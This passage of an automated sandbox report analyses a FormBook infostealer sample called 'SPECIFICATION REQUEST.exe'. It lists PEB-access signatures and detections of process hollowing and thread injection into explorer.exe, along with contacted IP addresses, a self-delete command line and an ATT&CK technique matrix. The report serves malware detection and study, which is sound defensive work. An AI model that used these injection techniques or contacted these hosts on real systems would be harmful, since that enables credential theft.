            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03304A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032D8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E3A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C5210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C5210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0330927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0337B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0337B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03398A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03354257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0338EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03384AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E4120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033451BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F61A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E99BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033469A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033849A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EC182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CB1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033541E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DB02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EA830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03394015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03394015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03382073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03391074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032E0050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033090AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C9080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03343884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03343884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C58EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C40E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032C4F2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EB73D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FE730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032FA70E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0335FF10 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0339070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0339070D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032EF716 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DFF60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03398F6A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032DEF40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03347794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032D8794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_033037F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_0337FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CE620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032CC600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_032F8E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\wlanext.exeCode function: 5_2_03381608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 194.245.148.189 80
            Source: C:\Windows\explorer.exeNetwork Connect: 64.92.125.40 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeThread register set: target process: 3472
            Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3472
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 1280000
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeProcess created: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe C:\Users\user\Desktop\SPECIFICATION REQUEST.exe
            Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\SPECIFICATION REQUEST.exe'
            Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
            Source: explorer.exe, 00000003.00000002.604591753.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000003.00000002.605318707.0000000001640000.00000002.00000001.sdmp, wlanext.exe, 00000005.00000002.608110953.0000000004530000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Users\user\Desktop\SPECIFICATION REQUEST.exe VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\SPECIFICATION REQUEST.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000005.00000002.603741374.00000000005B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.605460849.0000000000D70000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.234997361.00000000039B1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.275652340.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276091208.0000000001030000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.276039902.0000000000FF0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.604735296.0000000000C20000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.SPECIFICATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer4Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection512LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information4DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
